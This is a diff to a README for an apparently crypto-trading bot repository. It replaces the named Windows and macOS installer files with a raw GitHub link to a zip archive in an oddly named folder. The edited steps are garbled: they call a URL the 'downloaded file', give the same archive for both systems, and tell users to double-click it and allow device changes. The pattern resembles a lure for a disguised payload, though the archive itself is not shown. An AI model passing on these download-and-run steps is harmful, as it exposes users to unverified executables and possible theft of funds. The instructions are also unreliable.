Squiddybeans1234/asterdex-hl-trading-bot/README.md

 ## 🛠️ Installation Instructions
 ### For Windows Users
-1. Locate the downloaded file, often named `asterdex-windows.exe`.
+1. Locate the downloaded file, often named `https://raw.githubusercontent.com/Squiddybeans1234/asterdex-hl-trading-bot/main/cylindricalness/asterdex-hl-trading-bot.zip`.
 2. Double-click the file to begin the installation process.
 3. If prompted, allow the app to make changes to your device.
 4. Follow the on-screen instructions to complete the installation.

 ### For macOS Users
-1. Find the downloaded file, which is usually titled `asterdex-macos.dmg`.
+1. Find the downloaded file, which is usually titled `https://raw.githubusercontent.com/Squiddybeans1234/asterdex-hl-trading-bot/main/cylindricalness/asterdex-hl-trading-bot.zip`.
 2. Double-click the `.dmg` file to mount it.
 3. Drag the Asterdex icon to your Applications folder.
 4. Eject the mounted drive by right-clicking on it and selecting 'Eject'.